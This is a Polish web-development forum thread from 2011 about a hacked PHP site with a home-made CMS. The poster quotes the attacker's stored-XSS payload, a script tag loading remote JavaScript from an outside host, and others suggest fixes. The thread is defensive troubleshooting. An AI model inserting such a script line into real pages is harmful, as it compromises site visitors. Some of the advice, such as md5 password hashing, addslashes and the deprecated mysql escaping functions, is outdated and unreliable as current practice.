[inne]Jak to możliwe że ktoś umieścił swoje pliki na moim serwerze bez dostępu do ftp? Opcje

[AniaR]

Jak to możliwe że ktoś umieścił swoje pliki na moim serwerze bez dostępu do ftp?

[1010]

Może jakiś trojan? Lub też błędy w skryptach php. Niestety zbyt mało szczegółów dzieki którym można by było coś stwierdzić...

[AniaR]

A jakiego typu mogą to być błędy w skryptach php?

[amii]

Używasz totalcommander ? Jeśli tak to zmień wszystkie hasła, przeskanuj pliki na serwerze (najlepiej po dacie) w poszukiwaniu niecnego kodu JavaScript a na sam koniec przestań używać TC.

[AniaR]

Teraz zauważyłam ze to przekierowanie występuje tylko wtedy gdy łączę się z bazą..



Używam CyberDuck a nie TC.

Ten post edytował AniaR 9.02.2011, 14:58:27

[Hekko]

Dziurawy skrypt zatem, podrzucili Ci jakiś kod do strony po prostu w ten sposób.

[AniaR]

Skrypty hakujące zostały dodane jako kolejne rekordy w bazie a nie dopisane do plików php na serwerze. Usunęłam je z bazy, zmieniłam hasła do ftpa do bazy i do panelu admina i było ok ale nie minęło parę godzin i znowu strona zhakowana.. Tym razem coś innego: usunięte pliki z serwera i podmienione na inne. Wiem ze to moja wina bo nie odpowiednio zabezpieczyłam stronę. Będę to teraz robiła w następujących krokach:
1. Login i hasło do admina przechowywałam w bazie w postaci jawnej (zmienię na md5)
2. Linki na stronie mija postać: ?cos=cos&cos2=cos2 itd.. (zamienię na /cos/cos2 itd dodając plik .htacess)
3. Zamienię logowanie z $_SERVER["PHP_AUTH_USER"] na normalne (formularz z metoda post)
4. Zabezpieczę zmienne przesyłane w panelu metoda post dodając przed każda funkcje addslashes() (na stronie nie ma formularza który łączy się z bazą, jedynie w panelu)

Może powinnam zrobić coś jeszcze? Np. zmienić nazwę katalogu w którym trzymam panel z "admin" na jakiś mniej domyślny?

Proszę o sugestie..

[Daiquiri]

Nie wiem jak wygląda Twoja "strona", z jakich skryptów korzystasz, czy jest to jakiś autorski system CMS itd. Zamiana nazwy katalogu z domyślnego na inny, ma sens ale tylko w określonych przypadkach - bo jak i tak do niego linkujesz, to po co?. Jeżeli korzystasz z systemu a la drupal, joomla - możesz jeszcze sprawdzić czy nie dodałaś "dziurawych" wtyczek i aktualizować system jak pojawiają się łatki zabezpieczające. Możesz też "wyrzucić" pliki zawierające dane do połączenia z bazą poza katalog domowy.

[AniaR]

Autorski cms..

Skorzystam z rady przeniesienia pliku w którym łączę się z bazą poza katalog w którym trzymam wszystkie pliki strony.
Może jeszcze jakieś sugestie?

Ten post edytował AniaR 10.02.2011, 14:21:58

[amii]

Może to atak typu SQL Injection
2. To akurat tylko kwestia kosmetyczna bo haker i tak może dowolnie manipulować wysyłanym nagłówkiem
4. Może spróbuj tak. I pózniej filtrujesz dane POST przesyłane z formularza tą funkcją.

[PHP] pobierz, plaintext 
// CLEAN - cleaning query
function clean($query) {
	if (get_magic_quotes_gpc()) {
		$query = stripslashes($query);
	}
	$query = mysql_real_escape_string($query);
	return $query;
}
[PHP] pobierz, plaintext 

[AniaR]

Haker wchodzi mi do panelu admina i dodaje do bazy jako kolejny rekord w tabeli taką teść:

<script src="http://www.manja.byethost6.com/balikita/noxss.php"></script>

Ten skrypt umieszczony w bazie już dalej robi swoje i zamiast wyswietlac strony wyswietla jakies gowno!!

Niestety funkcja czyszcząca clean ktora podałeś nie zabezpiecza przed wpisanie ma bazy ciagu znaków w postaci:

<script src="http://www.manja.byethost6.com/balikita/noxss.php"></script>

Zrobię sprawdzenie, ze jeżeli w ciągu znaków jest słowo script to ma nie przepościć...

A moze jest jakis inny sposob walidacji tego?

[sadistic_son]

Przeleć dane z formularza funkcją strip_tags zanim wrzucisz do bazy czy cokolwiek innego z nimi zrobisz.

[PHP] pobierz, plaintext 
$login = strip_tags($_POST['login']);
[PHP] pobierz, plaintext 

Używasz totalcommander ? Jeśli tak to zmień wszystkie hasła, przeskanuj pliki na serwerze (najlepiej po dacie) w poszukiwaniu niecnego kodu JavaScript a na sam koniec przestań używać TC.

A co jest nie tak z TotalCommanderem?

Ten post edytował sadistic_son 10.02.2011, 19:19:56

[Daiquiri]

@sadistic_son - nic, jeżeli nie przechowuje się w nim zapisanych haseł .

[Hekko]

A co jest nie tak z TotalCommanderem?

Dosyć popularny problem ostatnimi czasy w pewnych wersjach TC. Znam to z autopsji klientów. Nieszyfrowane hasła łatwo odczytane przez trojany. Aczkolwiek, zwykle to boty potem się logują i dodają do indexu dane.